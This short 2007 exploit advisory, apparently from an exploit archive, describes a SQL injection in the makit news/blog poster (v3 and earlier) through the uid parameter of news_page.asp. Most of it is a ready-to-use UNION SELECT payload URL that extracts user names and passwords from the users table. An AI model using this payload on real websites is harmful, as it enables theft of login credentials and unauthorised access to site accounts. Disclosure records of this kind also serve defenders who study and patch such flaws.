makit-sql.txt
Posted on 27 January 2007
******************************************************************************* # Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.makit.net # $$ : Free ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//news_page.asp?uid=[SQL] Example: //news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1 [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!